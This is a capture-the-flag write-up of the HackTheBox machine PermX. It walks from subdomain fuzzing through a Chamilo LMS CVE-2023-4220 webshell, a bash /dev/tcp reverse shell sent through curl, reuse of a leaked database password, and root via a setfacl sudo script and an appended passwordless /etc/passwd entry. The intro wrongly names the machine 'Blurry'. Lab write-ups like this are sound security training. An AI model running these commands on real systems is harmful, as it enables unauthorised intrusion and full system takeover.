PermX - HackTheBox Machine WriteUp
This is my WriteUp for the medium difficulty Linux machine Blurry on HackTheBox Labs.
Recon
My first step was to scan with nmap the machine for open ports:
1
2
3
4
5
$ nmap -Pn -sV $LAB_IP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
There were only two open ports available:
- Port
22-ssh - Port
80-http(Apachehttpdweb server on version2.4.52)
But for us interesting, is the web application on port 80. I used gobuster to search the website for hidden files or directories:
1
2
3
4
5
6
7
8
9
10
11
$ gobuster dir -u "http://permx.htb" -w /usr/share/wordlists/dirb/big.txt
===============================================================
/.htpasswd (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/css (Status: 301) [Size: 304] [--> http://permx.htb/css/]
/img (Status: 301) [Size: 304] [--> http://permx.htb/img/]
/js (Status: 301) [Size: 303] [--> http://permx.htb/js/]
/lib (Status: 301) [Size: 304] [--> http://permx.htb/lib/]
/server-status (Status: 403) [Size: 274]
===============================================================
At the first sight, I found nothing interesting, so I used ffuf to scan for subdomains.
Unfortunately, the domain has many empty subdomains, so I filtered the http response size with the -fs flag:
1
2
3
4
5
6
$ ffuf -u http://permx.htb/ -H 'Host: FUZZ.permx.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -c -fs 250-300
---------------------------------------
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 17ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 57ms]
---------------------------------------
I found the subdomain lms.permx.htb and on their is a service called Chamilo, which is a E-Learning & Collaboration-Software.
Again, I will execute gobuster to find interesting files/directories:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ gobuster dir -u "http://lms.permx.htb" -w /usr/share/wordlists/dirb/big.txt
===============================================================
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/LICENSE (Status: 200) [Size: 35147]
/app (Status: 301) [Size: 312] [--> http://lms.permx.htb/app/]
/bin (Status: 301) [Size: 312] [--> http://lms.permx.htb/bin/]
/certificates (Status: 301) [Size: 321] [--> http://lms.permx.htb/certificates/]
/documentation (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]
/favicon.ico (Status: 200) [Size: 2462]
/main (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]
/plugin (Status: 301) [Size: 315] [--> http://lms.permx.htb/plugin/]
/robots.txt (Status: 200) [Size: 748]
/server-status (Status: 403) [Size: 278]
/src (Status: 301) [Size: 312] [--> http://lms.permx.htb/src/]
/vendor (Status: 301) [Size: 315] [--> http://lms.permx.htb/vendor/]
/web (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]
===============================================================
And indeed, gobuster found some interesting stuff. The README.md and LICENSEfile looks like this is a typical git repository.
I looked into the README.md file and I found a version number: 1.11.x
I researched for existing vulnerabilities and found a Proof of Concept (PoC) on Github for the version 1.11.24. We do not know if our web server is running a version below 1.11.24, but we can try to create a webshell with it. Therefore we can clone the git repository:
1
2
$ git clone https://github.com/Rai2en/CVE-2023-4220-Chamilo-LMS.git
$ cd CVE-2023-4220-Chamilo-LMS/
I executed the main.py script with our subdomain url lms.permx.htb and execute the action scan to check, if our Chamilo instance is vulnerable:
1
$ python3 main.py -u http://lms.permx.htb -a scan
The result indicated, that the instance of Chamilo is vulnerable, so we can try to execute the exploit and create a webshell with the webshell action:
1
$ python3 main.py -u http://lms.permx.htb -a webshell
The upload was successful and I was able to send commands to the webshell. I used that to create a reverse shell and therefore started my netcat listener on port 5555:
1
nc -lnvp 5555
And then I URL encoded the following reverse shell command with CyberChef:
1
bash -c "/bin/bash -i >& /dev/tcp/10.10.14.151/5555 0>&1"
After everything was setup, I used curl to execute our reverse shell in our created webshell:
1
curl "http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/webshell.php?cmd=bash%20%2Dc%20%22%2Fbin%2Fbash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E14%2E151%2F5555%200%3E%261%22"
It worked and I got a reverse shell!
Now lets get a foothold.
Foothold
The next step is to start and try to find a config file with useful information (like credentials). We can list the /home/ directory for existing home directories. There I found the home directory for the user mtz.
The. I used a couple of times the find command to search for interesting files (for example for sql, conf, db):
1
2
3
4
$ find /var/www/chamilo/ -type f -name 'configuration.php'
/var/www/chamilo/app/config/configuration.php
/var/www/chamilo/plugin/sepe/src/configuration.php
It worked and inside the configuration.php file, I found at the first few lines interesting database credentials:
1
2
3
4
5
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
I tried to login with the user namemtz and the password 03F6lY3uXAP2bkW8 via ssh:
1
2
$ ssh mtz@permx.htb
Password: 03F6lY3uXAP2bkW8
And it worked!
We got our user flag!
Privilege Escalation
Now the last step is to escalate our privileges and gain root access on the PermX machine.
Therefore my first step is to list all allowed commands that the user mtz can run with sudo:
1
2
3
$ sudo -l
(ALL : ALL) NOPASSWD: /opt/acl.sh
The output indicated, that we can run the script /opt/acl.sh with root privileges without a password.
The /opt/acl.sh mentioned looks like that:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
It uses the setfacl command, which sets Access Control Lists(ACLs) for files and directories. I used GTFOBins and found out, that there exists a privilege escalation method using a writable /etc/passwd file.
I could create a symbolic link of the /etc/passwd file to our home directory:
1
$ ln -s /etc/passwd /home/mtz/passwd_change
Then I used the /opt/acl.sh script to give our user mtz read and write permissions to the created symbolic link file /home/mtz/passwd_change:
1
$ sudo /opt/acl.sh mtz rw /home/mtz/passwd_change
The last step was to append the user hacker with root permissions to the writable passwd_change file, which is just a symbolic link to the /etc/passwd file:
1
$ echo "hacker::0:0:hacker:/root:/bin/bash" >> ./passwd_change
After that, I logged in as our created user hacker and had root access:
1
$ su hacker
It worked and I got the root flag.
Exploit Chain
Recon:
- Port scan with
nmap - Find the
lmssubdomain withffuf - Find the
README.mdfile and get the version of the Chamilo LMS service - Research for Chamilo
1.11.xvulnerabilities - Exploit the Chamilo LMS exploit, which creates a webshell
- Use the webshell to start a reverse shell
Foothold:
- Search the machine for configurations or sensitive files
- Find a database credentials
- Reuse the password with
ssh
Privilege Escalation:
- List allowed commands that
mtzcan run withsudo - Search for vulnerabilities in the
/opt/acl.shscript - Abuse the writable
/etc/passwdvulnerability to get a root shell